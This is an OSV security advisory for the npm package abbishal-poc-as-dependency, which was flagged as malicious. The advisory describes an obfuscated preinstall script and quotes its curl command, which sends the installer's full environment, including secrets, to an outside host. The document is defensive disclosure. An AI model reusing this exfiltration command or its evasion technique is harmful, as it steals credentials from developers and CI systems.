MAL-2026-17653

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc-as-dependency/MAL-2026-17653.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17653
Published
2026-10-08T03:36:37Z
Modified
2026-10-08T04:00:04Z
Summary
Malicious code in abbishal-poc-as-dependency (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53)

package.json declares a preinstall lifecycle script sh./test.sh. test.sh assembles a curl -d "$(env)" https://abbishal.com/sh/installation-success command by splitting the tokens curl, env, and -d across single-character shell variables (i=c, s=u, a=rl, t=en) and reconstructing them via variable concatenation and command substitution. On npm install this POSTs the entire output of env — the installer shell/CI's full process environment, including any exported secrets such as CI tokens, cloud credentials (AWS_*, GCP, Azure), and npm publish tokens — to a hardcoded third-party host. The README asserts that the package performs no network requests, no filesystem access, no data collection, and has no preinstall/postinstall lifecycle scripts, directly contradicting the shipped manifest and script. The variable-fragment obfuscation and the cover-story README indicate deliberate evasion rather than a legitimate placeholder or canary.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-021106",
            "import_time": "2026-10-08T03:50:28.268520535Z",
            "modified_time": "2026-10-08T03:36:44Z",
            "sha256": "484b402674ecbe568cbba8f2ceea75416fe46fc6ab549ae19594915eccbbfbe8",
            "source": "amazon-inspector",
            "versions": [
                "1.3.1"
            ]
        },
        {
            "id": "IN-MAL-2026-021105",
            "import_time": "2026-10-08T03:50:28.211914676Z",
            "modified_time": "2026-10-08T03:36:37Z",
            "sha256": "bc0e1fb6fb8f481baf7c16b593aa342b3b63165f9e97e395ff49c4bed18dfa53",
            "source": "amazon-inspector",
            "versions": [
                "1.3.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / abbishal-poc-as-dependency

Package

Name
abbishal-poc-as-dependency
View open source insights on deps.dev
Purl
pkg:npm/abbishal-poc-as-dependency

Affected ranges

Affected versions

1.*
1.3.0
1.3.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "test.sh",
            "sha256": "3d01b172ee5cba35a504d85d771561cc3bcf125a8cf21e2c5b4619c1d4ca521a",
            "tlsh": "acd07ddb0160e1f8efd2096f4b8212607aa4a0843912109c52da025b0201090754fc51"
        }
    ],
    "package_integrity": [
        {
            "filename": "abbishal-poc-as-dependency-1.3.1.tgz",
            "hashes": {
                "sha1": "8e04f735a8a7f93e3fc64369321aa4d459715828",
                "sha512_sri": "sha512-1ZaGyUWN1fI08yuTnUUNYoOp5zrkfTig8HMyxqrJoDiWC3MoKU9dd/6RJtWzGKw1wGwsoGrwyqnHkaQnIGppjw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc-as-dependency/MAL-2026-17653.json"